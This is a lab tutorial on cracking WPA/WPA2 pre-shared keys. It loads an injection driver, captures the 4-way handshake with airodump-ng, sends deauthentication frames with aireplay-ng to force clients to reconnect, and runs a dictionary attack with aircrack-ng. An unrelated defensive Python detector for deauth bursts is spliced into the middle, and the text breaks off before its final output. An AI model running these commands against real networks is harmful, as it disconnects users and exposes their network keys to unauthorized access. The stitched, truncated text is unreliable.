Hack WPA TKIP and AES


Crack WPA/TKIP or AES (WPA2 Enterprise / 802.1X with username and password authentication is very secure and is not covered here)

0. Configure WPA TKIP/AES authentication on the AP and the client

   WPA key: 8 to 63 characters. For this lab, enter 12345678 in the "Network key" box.

1. Mount the USB drive

   mkdir /mnt/usb
   mount /dev/sdb1 /mnt/usb

2. Copy the file ipwraw-ng.lzm to the /tmp directory and unpack it

   cd /mnt/usb/
   cp ipwraw-ng.lzm.bz2 /tmp
   cd /tmp
   mv ipwraw-ng.lzm.bz2 ipwraw-ng.lzm
   lzm2dir ipwraw-ng.lzm /

   This unpacks the drivers needed and creates a subdirectory named "ipwraw" in /tmp.

3. Install the ipwraw driver for the ipw3945 card

   cd /tmp/ipwraw
   make
   make install

4. Unload the old driver and load the new one

   The required drivers should now be installed. You now have TWO drivers for your card: the original ipw3945 driver and the ipwraw driver. To check that the new one works, make sure the original ipw3945 driver is not loaded:

   /sbin/modprobe -r ipw3945
   /usr/src/drivers/ipw3945-1.2.0/unload
   /tmp/ipwraw/load

   You should see the message "Interface up as rtap0 and ready for application connection". iwconfig will now show a wifi interface and an rtap interface that you can try out for injection.

Write down the MAC addresses of the client and the AP (in BT, copy them from the output). The commands below use the following addresses; change them to your own:

   MAC Client: 00:1B:77:60:18:E5
   MAC AP:     00:1C:10:62:69:D8

WPA handshake capture (WPA-PSK, airodump-ng / aireplay-ng)

5. Use airodump-ng to collect packets from the WLAN and capture the authentication handshake

   airodump-ng -c 11 --bssid 00:1C:10:62:69:D8 -w psk wifi0

   Where:
   -c 11 is the channel of the wireless network.
   --bssid 00:1C:10:62:69:D8 is the access point MAC address; this eliminates extraneous traffic.
   -w psk is the file name prefix for the files that will contain the captured packets (IVs).
   wifi0 is the interface name.

   Important: do NOT use the --ivs option. You must capture the full packets.

Use aireplay-ng to deauthenticate the wireless client

This step is optional. You only perform it if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, move on to the next step and be patient. Needless to say, if a wireless client shows up later, you can backtrack and perform this step. What this step does is send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting, and this is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, pick a client that is currently connected; you need its MAC address. Open another console session and enter:

   aireplay-ng -0 10 -a 00:1C:10:62:69:D8 -c 00:1B:77:60:18:E5 wifi0

Where:
-0 means deauthentication.
10 is the number of deauths to send (you can send multiple if you wish).
-a 00:1C:10:62:69:D8 is the MAC address of the access point.
-c 00:1B:77:60:18:E5 is the MAC address of the client you are deauthing.
wifi0 is the interface name.

The deauthentication packets are sent directly from your PC to the clients, so you must be physically close enough to the clients for your wireless card's transmissions to reach them.

Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests whether it is in fact the pre-shared key.
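From the defender's side, the deauthentication step above leaves a distinctive trace on the air: a burst of deauth frames addressed to one client within a second or two, all claiming the AP as sender. The following Python is an added example (it is not from the tutorial and not aircrack-ng code) of a sliding-window detector for that burst, of the kind a wireless IDS would run over decoded management frames. The frame field names, the window and threshold values, and the sample frame list are assumptions constructed for this example; the AP and client MAC addresses are reused from the tutorial.

```python
"""Detection-side view of the deauthentication step: flag deauth bursts.

Added example, not part of the original tutorial. It assumes a wireless
IDS or capture tool has already decoded 802.11 management frames into
dicts with the fields ts (seconds), subtype, src, dst and bssid; the
field names and the sample frames below are constructed for this example.
"""
from collections import defaultdict, deque

# Addresses reused from the tutorial's example; the frame list is constructed.
AP = "00:1C:10:62:69:D8"
CLIENT = "00:1B:77:60:18:E5"
OTHER_CLIENT = "00:11:22:33:44:55"
BROADCAST = "ff:ff:ff:ff:ff:ff"

WINDOW_SECONDS = 2.0   # sliding window length (assumed value)
THRESHOLD = 5          # more than this many deauths to one client per window is abnormal

SAMPLE_FRAMES = [
    {"ts": 0.0, "subtype": "beacon", "src": AP, "dst": BROADCAST, "bssid": AP},
    # A single deauth as a client leaves is normal and must not alert.
    {"ts": 0.5, "subtype": "deauth", "src": AP, "dst": OTHER_CLIENT, "bssid": AP},
    {"ts": 1.0, "subtype": "auth", "src": CLIENT, "dst": AP, "bssid": AP},
    {"ts": 1.1, "subtype": "assoc-req", "src": CLIENT, "dst": AP, "bssid": AP},
    # An isolated deauth well before the burst: outside the window, no alert.
    {"ts": 4.0, "subtype": "deauth", "src": AP, "dst": CLIENT, "bssid": AP},
] + [
    # Eight deauths to one client within 0.7 s: the shape of a forced
    # re-authentication. The src field claims the AP, so the sender
    # address alone cannot tell forged frames from real ones; the rate can.
    {"ts": round(10.0 + 0.1 * i, 1), "subtype": "deauth", "src": AP, "dst": CLIENT, "bssid": AP}
    for i in range(8)
]


def detect_deauth_bursts(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return one alert per (bssid, client) pair that receives more than
    `threshold` deauth frames within any `window` seconds.

    Frames are processed in timestamp order; per pair, a deque holds the
    timestamps still inside the window. Broadcast deauths group under the
    broadcast address, so a flood aimed at every client is also caught.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for frame in sorted(frames, key=lambda f: f["ts"]):
        if frame["subtype"] != "deauth":
            continue
        key = (frame["bssid"], frame["dst"])
        times = recent[key]
        times.append(frame["ts"])
        # Drop timestamps that have fallen out of the window.
        while times and frame["ts"] - times[0] > window:
            times.popleft()
        if len(times) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "bssid": key[0],
                "client": key[1],
                "count": len(times),          # deauths seen when the threshold was crossed
                "first_ts": times[0],
                "detected_at": frame["ts"],
            })
    return alerts


def format_alert(alert):
    """Render an alert as one log line."""
    return ("deauth burst: bssid={bssid} client={client} count={count} "
            "window={first_ts:.1f}-{detected_at:.1f}s").format(**alert)


if __name__ == "__main__":
    for alert in detect_deauth_bursts(SAMPLE_FRAMES):
        print(format_alert(alert))
```

On the constructed sample the detector raises exactly one alert, for the burst against 00:1B:77:60:18:E5, and stays quiet on the two isolated deauths, which is the behaviour you want from a rate-based rule: ordinary roaming and disconnects produce single frames, while a forced re-authentication produces many in quick succession. In a real deployment the threshold would be tuned against the network's own baseline, and the alert would be correlated with the 4-way handshake that follows it.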

There is a small dictionary that comes with aircrack-ng, password.lst. This file can be found in the test directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe it into aircrack-ng; using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

   aircrack-ng -w /mnt/usb/wordlists.lst -b 00:1C:10:62:69:D8 psk*.cap

Where:
-w /mnt/usb/wordlists.lst is the dictionary file (password.lst in the example above). Remember to specify the full path if the file is not located in the same directory.
-b 00:1C:10:62:69:D8 is the access point MAC address.
psk*.cap is the group of files containing the captured packets. Notice that we used the wildcard * to include multiple files.

Here is typical output when no handshake has been found:

   Opening psk-01.cap
   Opening psk-02.cap
   Opening psk-03.cap
   Opening psk-04.cap
   Read 1827 packets.

   No valid WPA handshakes found.

When this happens you either have to redo the deauthentication step, or wait longer if you are using the passive approach. With the passive approach you have to wait until a wireless client authenticates to the AP.

Here is typical output when a handshake has been found:

   Opening psk-01.cap
   Opening psk-02.cap
   Opening psk-03.cap
   Opening psk-04.cap
   Read 1827 packets.

   #  BSSID              ESSID  Encryption
   1  00:1C:10:62:69:D8  scnp   WPA (1 handshake)

   Choosing first network as target.

(Check the capture files with ls -l; note: > 200000 to 500000 IVs.)

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days. Here is what successfully cracking the pre-shared key looks like:
